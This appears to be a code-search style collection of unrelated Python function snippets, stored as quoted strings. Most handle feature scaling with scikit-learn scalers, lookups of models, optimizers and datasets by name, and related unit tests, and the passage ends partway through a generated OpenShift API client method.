scaler = MinMaxScaler(feature_range=(-1, 1))\n scaler = scaler.fit(train)\n # transform train\n train = train.reshape(train.shape[0], train.shape[1])\n train_scaled = scaler.transform(train)\n # transform test\n test = test.reshape(test.shape[0], test.shape[1])\n test_scaled = scaler.transform(test)\n return scaler, train_scaled, test_scaled", "def fit_scalers(self, df: pd.DataFrame) -> None:\n for feature, scaler in self._scalers.items():\n if feature == \"season\":\n scaler.fit(df[\"season\"].unique().reshape(-1, 
1))\n elif feature in FEATURES_TO_SCALE:\n values = np.concatenate((df[f\"home_{feature}\"].values, df[f\"away_{feature}\"].values))\n scaler.fit(np.unique(values).reshape(-1, 1))\n else:\n scaler.fit(df[feature].unique().reshape(-1, 1))", "def test_to_scaler_non_allowed_value_error(self):\n\n with pytest.raises(\n ValueError,\n match=r\"\"\"scaler should be one of; \\['min_max', 'max_abs', 'standard'\\]\"\"\",\n ):\n\n ScalingTransformer(columns=\"b\", scaler=\"zzz\", scaler_kwargs={\"a\": 1})", "def get_preprocessing(name):\n if name not in preprocessing_fn_map.keys():\n raise ValueError('Preprocessing name [%s] was not recognized.' % name)\n\n return preprocessing_fn_map[name].preprocess_image", "def scale_data(x_train: DF, x_test: DF, scaler: object = None) -> tp.Tuple[ARR, ARR]:\n if not scaler:\n scaler = StandardScaler()\n \n scaler.fit(x_train)\n return scaler.transform(x_train), scaler.transform(x_test)", "def get_scorer(scoring, compute=True):\n # This is the same as sklearns, only we use our SCORERS dict,\n # and don't have back-compat code\n if isinstance(scoring, six.string_types):\n try:\n scorer = SCORERS[scoring]\n except KeyError:\n raise ValueError('{} is not a valid scoring value. '\n 'Valid options are {}'.format(scoring,\n sorted(SCORERS)))\n else:\n scorer = scoring\n\n return scorer", "def test_scaler_transform_call(self, mocker, scaler, scaler_type_str):\n\n df = d.create_df_3()\n\n x = ScalingTransformer(\n columns=[\"b\", \"c\"], scaler=scaler, scaler_kwargs={\"copy\": True}\n )\n\n x.fit(df)\n\n mocked = mocker.patch(\n f\"sklearn.preprocessing.{scaler_type_str}.transform\",\n return_value=df[[\"b\", \"c\"]],\n )\n\n x.transform(df)\n\n assert mocked.call_count == 1, \"unexpected number of calls to scaler fit\"\n\n call_args = mocked.call_args_list[0]\n call_pos_args = call_args[0]\n call_kwargs = call_args[1]\n\n expected_positional_args = (df[[\"b\", \"c\"]],)\n\n h.assert_equal_dispatch(\n expected=expected_positional_args,\n actual=call_pos_args,\n msg=f\"unexpected positional args in {scaler_type_str} transform call\",\n )\n\n assert (\n call_kwargs == {}\n ), f\"unexpected kwargs in {scaler_type_str} transform call\"", "def petab_scale_to_amici_scale(scale_str):\n\n if scale_str == 'lin':\n return amici.ParameterScaling_none\n if scale_str == 'log':\n return amici.ParameterScaling_ln\n if scale_str == 'log10':\n return amici.ParameterScaling_log10\n raise ValueError(\"Invalid pscale \" + scale_str)", "def from_json(self, scaler_json):\n\n json_dict=json.loads(scaler_json)\n\n # Basic fields\n for key in ['feature_range', 'copy',\n 'n_features_in_', 'n_samples_seen_']:\n self.__setattr__(key, json_dict[key])\n\n # Some fields need to be numpy arraysget\n for key in ['scale_', 'min_', 'data_min_', 'data_max_', 'data_range_']:\n self.__setattr__(key, np.array(json_dict[key]))", "def dataset_by_name(name):\n return _datasets[name.lower()]", "def get_name():\n return \"SVM\"", "def retrieve_transformer(\n self,\n transformation: str = None,\n param: dict = {},\n df=None,\n random_seed: int = 2020,\n ):\n\n if transformation in (trans_dict.keys()):\n return trans_dict[transformation]\n\n elif transformation in list(have_params.keys()):\n return have_params[transformation](**param)\n\n elif transformation == 'MinMaxScaler':\n from sklearn.preprocessing import MinMaxScaler\n\n return MinMaxScaler()\n\n elif transformation == 'PowerTransformer':\n from sklearn.preprocessing import PowerTransformer\n\n transformer = PowerTransformer(\n method='yeo-johnson', 
standardize=True, copy=True\n )\n return transformer\n\n elif transformation == 'QuantileTransformer':\n from sklearn.preprocessing import QuantileTransformer\n\n quants = param[\"n_quantiles\"]\n quants = quants if df.shape[0] > quants else int(df.shape[0] / 3)\n param[\"n_quantiles\"] = quants\n return QuantileTransformer(copy=True, **param)\n\n elif transformation == 'StandardScaler':\n from sklearn.preprocessing import StandardScaler\n\n return StandardScaler(copy=True)\n\n elif transformation == 'MaxAbsScaler':\n from sklearn.preprocessing import MaxAbsScaler\n\n return MaxAbsScaler(copy=True)\n\n elif transformation == 'RobustScaler':\n from sklearn.preprocessing import RobustScaler\n\n return RobustScaler(copy=True)\n\n elif transformation == 'PCA':\n from sklearn.decomposition import PCA\n\n # could probably may it work, but this is simpler\n if df.shape[1] > df.shape[0]:\n raise ValueError(\"PCA fails when n series > n observations\")\n transformer = PCA(\n n_components=min(df.shape), whiten=False, random_state=random_seed\n )\n return transformer\n\n elif transformation == 'FastICA':\n from sklearn.decomposition import FastICA\n\n if df.shape[1] > 500:\n raise ValueError(\"FastICA fails with > 500 series\")\n transformer = FastICA(\n n_components=df.shape[1],\n whiten=True,\n random_state=random_seed,\n **param,\n )\n return transformer\n\n elif transformation in ['RollingMean', 'FixedRollingMean']:\n param = 10 if param is None else param\n if not str(param).isdigit():\n window = int(''.join([s for s in str(param) if s.isdigit()]))\n window = int(df.shape[0] / window)\n else:\n window = int(param)\n window = 2 if window < 2 else window\n self.window = window\n if transformation == 'FixedRollingMean':\n transformer = RollingMeanTransformer(window=self.window, fixed=True)\n else:\n transformer = RollingMeanTransformer(window=self.window, fixed=False)\n return transformer\n\n elif transformation in ['SeasonalDifference', 'SeasonalDifferenceMean']:\n if transformation == 'SeasonalDifference':\n return SeasonalDifference(lag_1=param, method='LastValue')\n else:\n return SeasonalDifference(lag_1=param, method='Mean')\n\n elif transformation == 'RollingMean100thN':\n window = int(df.shape[0] / 100)\n window = 2 if window < 2 else window\n self.window = window\n return RollingMeanTransformer(window=self.window)\n\n elif transformation == 'RollingMean10thN':\n window = int(df.shape[0] / 10)\n window = 2 if window < 2 else window\n self.window = window\n return RollingMeanTransformer(window=self.window)\n\n else:\n print(\n f\"Transformation {transformation} not known or improperly entered, returning untransformed df\"\n )\n return EmptyTransformer()", "def scale_on_2d(x2d, scaler):\n return scaler.transform(x2d)", "def __init__(self, predictor, scaler):\n\n # Check arguments\n if predictor is None:\n raise ValueError('Cannot load genotyper predictor `None`')\n\n if scaler is None:\n raise ValueError('Cannot load feature scaler `None`')\n\n if isinstance(predictor, str):\n predictor = joblib.load(predictor)\n\n if isinstance(scaler, str):\n scaler = joblib.load(scaler)\n\n if not isinstance(predictor, SVC):\n raise ValueError('Predictor must be class sklearn.svm.SVC: Found \"{}\"'.format(type(predictor)))\n\n if not isinstance(scaler, StandardScaler):\n raise ValueError(\n 'Scaler must be class sklearn.preprocessing.StandardScaler: Found \"{}\"'.format(type(scaler))\n )\n\n # Set fields\n self.predictor = predictor\n self.scaler = scaler", "def get_prescales(process,path):\n 
prescale_service = [val for name,val in process.services_().items() if val.type_()==\"PrescaleService\"]\n if prescale_service:\n for para in prescale_service[0].prescaleTable:\n if para.pathName.value()==path.label():\n return para.prescales.value()\n return [1]*max(len(prescale_service[0].lvl1Labels),1)\n else:\n return [1]", "def pre_processing(self, whole_dataset, type=None):\n # for svm\n X = whole_dataset\n if self._scaler == None:\n self._scaler = preprocessing.StandardScaler().fit(X)\n else:\n basic.outputlogMessage('warning, StandardScaler object already exist, this operation will overwrite it')\n self._scaler = preprocessing.StandardScaler().fit(X)\n # save\n joblib.dump(self._scaler, scaler_saved_path)", "def scalers(self):\n sc = StandardScaler() if self.scm == 'ss' else MinMaxScaler()\n sc.fit(self.t)\n return pd.DataFrame(sc.transform(self.t), columns=self.t.columns.values), pd.DataFrame(sc.transform(self.v), columns=self.v.columns.values)", "def from_config(cls, config: dict):\n\n func = cls.deserialize_func(config.pop('func'))\n\n # do not deserialize inverse_func here, it will be done in init method\n scaler = cls(func=func, inverse_func=config.pop('inverse_func'), **cls.deserialize(**config))\n\n setattr(scaler, '_from_config', True)\n\n return scaler", "def get_cls(dataset_name):\n return find_dataset_using_name(dataset_name)", "def scale(self, X_train, X_test):\n\n #X_train, X_test, y_train, y_test = self.split_X_y_sets()\n self.scaler.fit(X_train)\n X_train_sc = self.scaler.transform(X_train)\n X_test_sc = self.scaler.transform(X_test)\n\n return X_train_sc, X_test_sc #, y_train, y_test", "def scale(self, data: np.ndarray):\n if self.scale_type == \"min_max\":\n scaled_data = (data - self.predictor_min) / (\n self.predictor_max - self.predictor_mean\n )\n elif self.scale_type == \"normalize\":\n scaled_data = (data - self.predictor_mean) / (\n self.predictor_max - self.predictor_min\n )\n elif self.scale_type == \"standardize\":\n scaled_data = (data - self.predictor_mean) / self.predictor_std\n elif self.scale_type == \"scale\":\n scaled_data = data - self.predictor_mean\n else:\n scaled_data = data\n return scaled_data", "def any_scale(scale):\n return scale", "def fnScaleFeatures(x_features, scaler=None, save=False):\n base_path = os.path.dirname(os.getcwd())\n # ToDo - Allow ability to read in path to Pickle\n\n # Read Feature Data Dictionary\n # ToDo - clean up and remove the 2\n feature_list = pd.read_csv('{}/mmml/mmml/feature_list2.csv'.format(base_path))\n columns_key = getFeatureDict(feature_list)\n scale_cols = columns_key['scale_cols']\n scale_cols = list(set([x[:-2] for x in scale_cols])) # Remove _H / _A suffixes\n\n x_features = x_features.copy()\n\n # Fit Scaler\n if scaler is None:\n logger.info(\"Fitting Min-Max Scaler\")\n min_max_scaler = preprocessing.MinMaxScaler()\n fitted_scaler = min_max_scaler.fit(pd.DataFrame(x_features[scale_cols]))\n\n # Save Min-Max Scaler\n saveResults(object=fitted_scaler, dir='Model_Objects', file_name='fitted_scaler.pkl')\n\n else:\n logger.info(\"Using Min-Max Scaler passed as argument\")\n fitted_scaler = scaler\n # ToDo - Accomodate path to saved scaler\n\n # Transform DF\n scaled_df = pd.DataFrame(fitted_scaler.transform(x_features[scale_cols]),\n columns=[x+\"_scaled\" for x in scale_cols], index=x_features.index)\n\n # Average of scaled columns\n logger.info(\"Creating average ranking of Massey columns\")\n avg_rank = pd.DataFrame(scaled_df[[x+\"_scaled\" for x in scale_cols]].mean(axis=1), 
columns=['Avg_Rank'])\n\n scaled_x_features = x_features.merge(avg_rank, left_index=True, right_index=True)\n\n # Save to Pickle\n if save!=False:\n saveResults(object=scaled_x_features, dir='Data/Processed', file_name='{}.pkl'.format(save))\n\n return scaled_x_features, fitted_scaler", "def getscales(self):\n return self.scales", "def get_optim(name: str):\n if name.lower() == 'adam':\n optimizer = torch.optim.Adam\n elif name.lower() == 'adamw':\n optimizer = torch.optim.AdamW\n elif name.lower() == 'sgd':\n optimizer = torch.optim.SGD\n elif name.lower() == 'sgdw':\n from ..learn.optim import SGDW\n optimizer = SGDW\n elif name.lower() == 'nsgd':\n from ..learn.optim import NesterovSGD\n optimizer = NesterovSGD\n elif name.lower() == 'nsgdw':\n from ..learn.optim import NesterovSGDW\n optimizer = NesterovSGDW\n elif name.lower() == 'rmsprop':\n optimizer = torch.optim.rmsprop\n elif name.lower() == 'adagrad':\n optimizer = torch.optim.adagrad\n elif name.lower() == 'amsgrad':\n from ..learn.optim import AMSGrad\n optimizer = AMSGrad\n else:\n raise SynthtorchError(f'Optimizer: \"{name}\" not a valid optimizer routine or not supported.')\n return optimizer", "def _choose_model(self, model_str):\n if model_str == 'lg':\n return(LogisticRegression())\n elif model_str == 'rf':\n return(RandomForestClassifier())\n elif model_str == 'svm':\n # return SVC(C=1, kernel='linear') # linear boundary\n return SVC(C=1, kernel='poly', degree=2) # non-linear boundary\n # return SVC(C=1, kernel='rbf')\n # return SVC(C=1, kernel='sigmoid') # binary classification", "def test_output_from_scaler_transform_set_to_columns(\n self, mocker, scaler, scaler_type_str\n ):\n\n df = d.create_df_3()\n\n x = ScalingTransformer(\n columns=[\"b\", \"c\"], scaler=scaler, scaler_kwargs={\"copy\": True}\n )\n\n x.fit(df)\n\n scaler_transform_output = pd.DataFrame(\n {\"b\": [1, 2, 3, 4, 5, 6, 7], \"c\": [7, 6, 5, 4, 3, 2, 1]}\n )\n\n mocker.patch(\n f\"sklearn.preprocessing.{scaler_type_str}.transform\",\n return_value=scaler_transform_output,\n )\n\n df_transformed = x.transform(df)\n\n h.assert_equal_dispatch(\n expected=scaler_transform_output,\n actual=df_transformed[[\"b\", \"c\"]],\n msg=f\"output from {scaler_type_str} transform not assigned to columns\",\n )", "def get_scaling_type(df_mfactors: pd.DataFrame, cmdl_args):\n eps = 0.9\n normalized_inst_ratio = 0\n\n # Check if there is only one trace\n if len(df_mfactors.index) == 1:\n return 'strong'\n\n for index, row in df_mfactors.iterrows():\n inst_ratio = float(row[MOD_FACTORS_DOC['useful_ins']]) / float(df_mfactors[MOD_FACTORS_DOC['useful_ins']][0])\n proc_ratio = float(row[MOD_FACTORS_DOC['num_processes']]) / float(\n df_mfactors[MOD_FACTORS_DOC['num_processes']][0])\n normalized_inst_ratio += inst_ratio / proc_ratio\n\n # Get the average inst increase. 
Ignore ratio of first trace (1.0)\n normalized_inst_ratio = (normalized_inst_ratio - 1) / (len(df_mfactors.index) - 1)\n\n scaling_computed = ''\n\n if normalized_inst_ratio > eps:\n scaling_computed = 'weak'\n else:\n scaling_computed = 'strong'\n\n if cmdl_args.scaling == 'auto':\n if cmdl_args.debug:\n print(f'==DEBUG== Detected {scaling_computed} scaling.')\n print('')\n return scaling_computed\n\n if cmdl_args.scaling == 'weak':\n if scaling_computed == 'strong':\n print('==WARNING== Scaling set to weak scaling but detected strong scaling.')\n print('')\n return 'strong'\n\n if cmdl_args.scaling == 'strong':\n if scaling_computed == 'weak':\n print('==WARNING== Scaling set to strong scaling but detected weak scaling.')\n print('')\n return 'strong'\n\n print('==ERROR== Reached undefined control flow state.')\n sys.exit(1)", "def from_name(self, name):\n return self._name_to_loadout.get(name.lower())", "def _call_scale(vecObj, sc):\n res = vecObj.scale(sc)\n return res", "def get_loader(dataset_name, **kwargs):\n if dataset_name == \"rostd\":\n loader = partial_class(ROSTDLoader,\n data_root_dir=\"data/rostd\",\n use_coarse_labels=False)\n elif dataset_name == \"rostd_coarse\":\n loader = partial_class(ROSTDLoader,\n data_root_dir=\"data/rostd\",\n use_coarse_labels=True)\n elif dataset_name == \"snips_75\":\n loader = partial_class(SNIPSLoader,\n data_root_dir=\"data/snips\",\n K=75, version=kwargs['version'])\n elif dataset_name == \"snips_25\":\n loader = partial_class(SNIPSLoader,\n data_root_dir=\"data/snips\",\n K=25, version=kwargs['version'])\n elif dataset_name == \"clinc\":\n loader = partial_class(CLINC150Loader,\n data_path=\"data/clinc/data_full.json\",\n unsupervised=True)\n elif dataset_name == \"clinc_sup\":\n loader = partial_class(CLINC150Loader,\n data_path=\"data/clinc/data_full.json\",\n unsupervised=False)\n elif dataset_name == 'sst':\n loader = partial_class(SSTLoader,\n data_root_dir=\"data/sst\",\n ood_type=kwargs['ood_type'])\n else:\n raise RuntimeError(f\"Bad dataset: {dataset_name}\")\n return loader", "def get_scaling_factor(c, default=None, warning=False, exception=False, hint=None):\n try:\n sf = c.parent_block().scaling_factor[c]\n except (AttributeError, KeyError):\n if not isinstance(c, (pyo.Param, _ParamData)):\n if hint is None:\n h = \"\"\n else:\n h = f\", {hint}\"\n if warning:\n if hasattr(c, \"is_component_type\") and c.is_component_type():\n _log.warning(f\"Missing scaling factor for {c}{h}\")\n else:\n _log.warning(f\"Trying to get scaling factor for unnamed expr {h}\")\n if exception and default is None:\n if hasattr(c, \"is_component_type\") and c.is_component_type():\n _log.error(f\"Missing scaling factor for {c}{h}\")\n else:\n _log.error(f\"Trying to get scaling factor for unnamed expr {h}\")\n raise\n sf = default\n else:\n # Params can just use current value (as long it is not 0)\n val = pyo.value(c)\n if not val == 0:\n sf = abs(1 / pyo.value(c))\n else:\n sf = 1\n return sf", "def get_voc_named_optim(self, name):\n return self.voc_checkpoints/f'{name}_optim.pyt'", "def get_initialization_by_name(name: str) -> Any:\n\n methods = {\n \"uniform\": nn.init.uniform_,\n \"normal\": nn.init.normal_,\n \"eye\": nn.init.eye_,\n \"xavier_uniform\": nn.init.xavier_uniform_,\n \"xavier\": nn.init.xavier_uniform_,\n \"xavier_normal\": nn.init.xavier_normal_,\n \"kaiming_uniform\": nn.init.kaiming_uniform_,\n \"kaiming\": nn.init.kaiming_uniform_,\n \"kaiming_normal\": nn.init.kaiming_normal_,\n \"he\": nn.init.kaiming_normal_,\n \"orthogonal\": 
nn.init.orthogonal_,\n }\n\n if name not in methods.keys():\n raise KeyError(\"Given initialization method name doesn\\'t exist \\\n or it is not supported.\")\n\n return methods[name]", "def scaled_to_name(a):\r\n wt_list = ['Rx','Sc']\r\n return wt_list[a]", "def scale_inverse_transform(whatever_scaler, X):\n x_new = tf.identity(X)\n try:\n x_new -= whatever_scaler.min_\n x_new /= whatever_scaler.scale_\n except AttributeError:\n x_new *= whatever_scaler.scale_\n x_new += whatever_scaler.mean_\n return x_new", "def normalize_features(self, scaler: StandardScaler = None, replace_nan_token: int = 0) -> StandardScaler:\n if len(self.data) == 0 or self.data[0].features is None:\n return None\n\n if scaler is not None:\n self.scaler = scaler\n\n elif self.scaler is None:\n features = np.vstack([d.features for d in self.data])\n self.scaler = StandardScaler(replace_nan_token=replace_nan_token)\n self.scaler.fit(features)\n\n for d in self.data:\n d.set_features(self.scaler.transform(d.features.reshape(1, -1))[0])\n\n return self.scaler", "def load_model(pickle_file):\n if os.path.isfile(pickle_file) == False:\n return None, None\n \n f = open(pickle_file, \"rb\")\n from_dump = pickle.load(f)\n f.close()\n\n return from_dump['clf'], from_dump['scaler']", "def get_scale_op(self):\n\t\treturn self.variables.get('scale')", "def get_feature_extractor(name):\n if name == \"MLP\":\n return MLP\n elif name == \"CNN\":\n return CNN\n elif name == \"Fixup\":\n return FixupCNN\n else:\n raise ValueError(\"Specified model not found!\")", "def load_transform(wavelet_name, nb_scale, **kwargs):\n if wavelet_name == 'activeletDecim':\n return DecimatedActiveletTransform(nb_scale)\n elif wavelet_name == 'activeletUndecim':\n return UndecimatedActiveletTransform(nb_scale)\n else:\n kwargs[\"name\"] = wavelet_name\n return PyWTransform(nb_scale, **kwargs)", "def get_data_provider_by_name(name, train_params):\n if name == 'UCF101':\n return DataProvider(**train_params)\n if name == 'MERL':\n return DataProvider(**train_params)\n if name == 'KTH':\n return DataProvider(**train_params)\n else:\n print(\"Sorry, data provider for `%s` dataset \"\n \"was not implemented yet\" % name)\n exit()", "def scale_set(train,test):\n sc = StandardScaler()\n fitted = sc.fit(train)\n return sc.transform(train), sc.transform(test)", "def fit(self, df, method='min_max_scaling', per_col_scaler=False):\n # Does df contain multiple columns ?\n if df.size == len(df) or per_col_scaler is True:\n # df contains multiple columns\n lbl_list = df.columns.values\n for lbl in lbl_list:\n try:\n min_val = float(np.amin(df[lbl]))\n max_val = float(np.amax(df[lbl]))\n mean_val = float(np.mean(df[lbl]))\n std_val = float(np.std(df[lbl]))\n # TODO Validate/Debug Robust Scaler\n q1_val = float(np.percentile(df[lbl], 25))\n q3_val = float(np.percentile(df[lbl], 75))\n except TypeError:\n raise Exception(\"[ERROR] TypeError in normalization fit\")\n scaler = self.Scaler(min_val=min_val, max_val=max_val,\n mean_val=mean_val, std_val=std_val,\n q1=q1_val, q3=q3_val,\n method=method)\n self.dict_scalers[lbl] = scaler\n else:\n # df contains one single column or scaling is applied\n # independently for each feature/column\n try:\n min_val = float(np.amin(df))\n max_val = float(np.amax(df))\n mean_val = float(np.mean(df))\n std_val = float(np.std(df))\n # TODO Validate/Debug Robust Scaler\n q1_val = float(np.percentile(df, 25))\n q3_val = float(np.percentile(df, 75))\n except TypeError:\n raise Exception(\"[ERROR] TypeError in normalization fit\")\n scaler 
= self.Scaler(min_val=min_val, max_val=max_val,\n mean_val=mean_val, std_val=std_val,\n q1=q1_val, q3=q3_val,\n method=method)\n self.dict_scalers['OneForAll'] = scaler", "def get_model(name, dataset):\n field_dims = dataset.field_dims\n if name == 'lr':\n return LogisticRegressionModel(field_dims)\n elif name == 'fm':\n return FactorizationMachineModel(field_dims, embed_dim=16)\n elif name == 'hofm':\n return HighOrderFactorizationMachineModel(\n field_dims, order=3, embed_dim=16)\n elif name == 'ffm':\n return FieldAwareFactorizationMachineModel(field_dims, embed_dim=4)\n elif name == 'fnn':\n return FactorizationSupportedNeuralNetworkModel(\n field_dims, embed_dim=16, mlp_dims=(16, 16), dropout=0.2)\n elif name == 'wd':\n return WideAndDeepModel(\n field_dims, embed_dim=16, mlp_dims=(16, 16), dropout=0.2)\n elif name == 'ipnn':\n return ProductNeuralNetworkModel(\n field_dims,\n embed_dim=16,\n mlp_dims=(16, ),\n method='inner',\n dropout=0.2)\n elif name == 'opnn':\n return ProductNeuralNetworkModel(\n field_dims,\n embed_dim=16,\n mlp_dims=(16, ),\n method='outer',\n dropout=0.2)\n elif name == 'dcn':\n return DeepCrossNetworkModel(\n field_dims,\n embed_dim=16,\n num_layers=3,\n mlp_dims=(16, 16),\n dropout=0.2)\n elif name == 'nfm':\n return NeuralFactorizationMachineModel(\n field_dims, embed_dim=64, mlp_dims=(64, ), dropouts=(0.2, 0.2))\n elif name == 'ncf':\n # only supports MovieLens dataset because for other datasets user/item colums are indistinguishable\n assert isinstance(dataset, MovieLens20MDataset) or isinstance(\n dataset, MovieLens1MDataset)\n return NeuralCollaborativeFiltering(\n field_dims,\n embed_dim=16,\n mlp_dims=(16, 16),\n dropout=0.2,\n user_field_idx=dataset.user_field_idx,\n item_field_idx=dataset.item_field_idx)\n elif name == 'fnfm':\n return FieldAwareNeuralFactorizationMachineModel(\n field_dims, embed_dim=4, mlp_dims=(64, ), dropouts=(0.2, 0.2))\n elif name == 'dfm':\n return DeepFactorizationMachineModel(\n field_dims, embed_dim=16, mlp_dims=(16, 16), dropout=0.2)\n elif name == 'xdfm':\n return ExtremeDeepFactorizationMachineModel(\n field_dims,\n embed_dim=16,\n cross_layer_sizes=(16, 16),\n split_half=False,\n mlp_dims=(16, 16),\n dropout=0.2)\n elif name == 'afm':\n return AttentionalFactorizationMachineModel(\n field_dims, embed_dim=16, attn_size=16, dropouts=(0.2, 0.2))\n elif name == 'afi':\n return AutomaticFeatureInteractionModel(\n field_dims,\n embed_dim=16,\n atten_embed_dim=64,\n num_heads=2,\n num_layers=3,\n mlp_dims=(400, 400),\n dropouts=(0, 0, 0))\n elif name == 'afn':\n print('Model:AFN')\n return AdaptiveFactorizationNetwork(\n field_dims,\n embed_dim=16,\n LNN_dim=1500,\n mlp_dims=(400, 400, 400),\n dropouts=(0, 0, 0))\n else:\n raise ValueError('unknown model name: ' + name)", "def min_max_scaler(X_train, X_validate, X_test):\n scaler = sklearn.preprocessing.MinMaxScaler().fit(X_train)\n X_train_scaled = pd.DataFrame(scaler.transform(X_train), index = X_train.index, columns = X_train.columns)\n X_validate_scaled = pd.DataFrame(scaler.transform(X_validate), index = X_validate.index, columns = X_validate.columns)\n X_test_scaled = pd.DataFrame(scaler.transform(X_test), index = X_test.index, columns = X_test.columns)\n \n return scaler, X_train_scaled, X_validate_scaled, X_test_scaled", "def choose_normalization(x, normalization, name=None):\n if normalization is not None and normalization is not 'none':\n if normalization == 'batch_norm':\n # x = BatchNormalization()(x)\n # TODO(ahundt) using nasnet default BatchNorm options, revert 
if this causes problems\n x = BatchNormalization(axis=-1, momentum=0.9997, epsilon=1e-3)(x)\n elif normalization == 'group_norm':\n x = GroupNormalization()(x)\n return x", "def kernel_for_string(name: str, lengthscale: float = 1.) -> GPy.kern.Kern:\n variance = .3 ** 2\n if name == 'RBF':\n return GPy.kern.RBF(input_dim=1, lengthscale=lengthscale)\n if name == 'Exponential':\n return GPy.kern.Exponential(input_dim=1, lengthscale=lengthscale)\n if name == 'Matern32':\n return GPy.kern.Matern32(input_dim=1, lengthscale=lengthscale)\n if name == 'Matern52':\n return GPy.kern.Matern52(input_dim=1, lengthscale=lengthscale)\n if name == 'PeriodicExponential':\n return GPy.kern.PeriodicExponential(input_dim=1, period=2. * np.pi, lengthscale=lengthscale, variance=variance)\n if name == 'PeriodicMatern32':\n return GPy.kern.PeriodicMatern32(input_dim=1, period=2. * np.pi, lengthscale=lengthscale, variance=variance)\n if name == 'PeriodicMatern52':\n return GPy.kern.PeriodicMatern52(input_dim=1, period=2. * np.pi, lengthscale=lengthscale)\n if name == 'StdPeriodic':\n return GPy.kern.StdPeriodic(input_dim=1, period=2. * np.pi, lengthscale=lengthscale)\n if name == 'Brownian':\n return GPy.kern.Brownian(input_dim=1)\n if name == 'ExpQuad':\n return GPy.kern.ExpQuad(input_dim=1, lengthscale=lengthscale)\n if name == 'OU':\n return GPy.kern.OU(input_dim=1, lengthscale=lengthscale)\n if name == 'RatQuad':\n return GPy.kern.RatQuad(input_dim=1, lengthscale=lengthscale)\n if name == 'White':\n return GPy.kern.White(input_dim=1)\n if name == 'MLP':\n return GPy.kern.MLP(input_dim=1) # has other parameters\n if name == 'Spline':\n return GPy.kern.Spline(input_dim=1)\n if name == 'Poly':\n return GPy.kern.Poly(input_dim=1) # has other parameters\n\n raise LookupError()", "def scaling_object(self):\n return self.__scaling_object", "def from_name(cls, name: str, pde: PDEBase, **kwargs) -> SolverBase:\n try:\n # obtain the solver class associated with `name`\n solver_class = cls._subclasses[name]\n except KeyError:\n # solver was not registered\n solvers = (\n f\"'{solver}'\"\n for solver in sorted(cls._subclasses.keys())\n if not solver.endswith(\"Solver\")\n )\n raise ValueError(\n f\"Unknown solver method '{name}'. 
Registered solvers are \"\n + \", \".join(solvers)\n )\n\n return solver_class(pde, **kwargs)", "def from_string(cls, name):\n if hasattr(cls,name):\n return cls.__getattribute__(name)\n else:\n return None", "def from_name(self, name):\n return self._name_to_operator.get(name.lower())", "def dataScaling(x_train,x_test,experiment_path,dataset_name,cvCount):\n scale_train_df = None\n scale_test_df = None\n # Scale features (x) using training data\n scaler = StandardScaler()\n scaler.fit(x_train)\n x_train = pd.DataFrame(scaler.transform(x_train), columns=x_train.columns)\n # Scale features (x) using fit scalar in corresponding testing dataset\n x_test = pd.DataFrame(scaler.transform(x_test), columns=x_test.columns)\n #Save scalar for future use\n outfile = open(experiment_path + '/' + dataset_name + '/exploratory/scale_impute/scaler_cv'+str(cvCount), 'wb')\n pickle.dump(scaler, outfile)\n outfile.close()\n return x_train, x_test", "def get_classifier(clf_name, params):\n if clf_name == 'KNN':\n clf = KNeighborsClassifier(n_neighbors=params[\"K\"])\n\n elif clf_name == 'SVM':\n clf = SVC(C=params[\"C\"])\n\n elif clf_name == 'Random Forest':\n clf = RandomForestClassifier(n_estimators=params[\"n_estimators\"],\n max_depth = params[\"max_depth\"], random_state=1234)\n\n else:\n clf = LogisticRegression()\n\n return clf", "def from_string(name: str) -> Algorithm:\n if name == \"caesar\":\n return Algorithm.caesar\n elif name == \"substitution\":\n return Algorithm.substitution\n elif name == \"transposition\":\n return Algorithm.transposition\n elif name == \"affine\":\n return Algorithm.affine\n elif name == \"vigenere\":\n return Algorithm.vigenere", "def __getattribute__(self, name):\n if name in [\"sampling_function\", \"env\", \"fit_dist\", \"reset\"]:\n return object.__getattribute__(self, name)\n\n else:\n return getattr(self.env, name)", "def standardize(X):\n\n scaler = StandardScaler()\n X_scaled = scaler.fit_transform(X)\n return X_scaled", "def set_scale(self, motor_model):\n for driver_re, motor_dict in self.__SCALE_FACTORS_BY_MODEL.iteritems():\n if driver_re.match(self._apt.model_number) is not None:\n if motor_model in motor_dict:\n self.scale_factors = motor_dict[motor_model]\n return\n else:\n break\n # If we've made it down here, emit a warning that we didn't find the\n # model.\n logger.warning(\n \"Scale factors for controller {} and motor {} are unknown\".format(\n self._apt.model_number, motor_model\n )\n )", "def prescaler(self, value: int, /) -> None:", "def get_sampler(\n sampler: str, **kwargs: float\n ) -> Type[dist.Distribution]:\n\n samplers = {\n \"bernoulli\": lambda x: dist.Bernoulli(x, validate_args=False),\n \"continuous_bernoulli\": lambda x: dist.ContinuousBernoulli(x),\n \"gaussian\": lambda x: dist.Normal(x, kwargs.get(\"decoder_sig\", 0.5))\n }\n\n if sampler not in samplers.keys():\n raise KeyError(\n \"Select between the following decoder \"\n \"samplers: {}\".format(list(samplers.keys()))\n )\n\n return samplers[sampler]", "def test_read_namespaced_scale_scale(self):\n pass", "def read_namespaced_scale_scale(self, namespace, name, **kwargs):\n\n all_params = ['namespace', 'name', 'pretty']\n all_params.append('callback')\n\n params = locals()\n for key, val in iteritems(params['kwargs']):\n if key not in all_params:\n raise TypeError(\n \"Got an unexpected keyword argument '%s'\"\n \" to method read_namespaced_scale_scale\" % key\n )\n params[key] = val\n del params['kwargs']\n\n # verify the required parameter 'namespace' is set\n if ('namespace' not 
in params) or (params['namespace'] is None):\n raise ValueError(\"Missing the required parameter `namespace` when calling `read_namespaced_scale_scale`\")\n # verify the required parameter 'name' is set\n if ('name' not in params) or (params['name'] is None):\n raise ValueError(\"Missing the required parameter `name` when calling `read_namespaced_scale_scale`\")\n\n resource_path = '/oapi/v1/namespaces/{namespace}/deploymentconfigs/{name}/scale'.replace('{format}', 'json')\n path_params = {}\n if 'namespace' in params:\n path_params['namespace'] = params['namespace']\n if 'name' in params:\n path_params['name'] = params['name']\n\n query_params = {}\n if 'pretty' in params:\n query_params['pretty'] = params['pretty']\n\n header_params = {}\n\n form_params = []\n local_var_files = {}\n\n body_params = None\n\n # HTTP header `Accept`\n header_params['Accept'] = self.api_client.\\\n select_header_accept(['application/json', 'application/yaml'])\n if not header_params['Accept']:\n del header_params['Accept']\n\n # HTTP header `Content-Type`\n header_params['Content-Type'] = self.api_client.\\\n select_header_content_type(['*/*'])\n\n # Authentication setting\n auth_settings = []\n\n response = self.api_client.call_api(resource_path, 'GET',\n path_params,\n query_params,\n header_params,\n body=body_params,\n post_params=form_params,\n files=local_var_files,\n 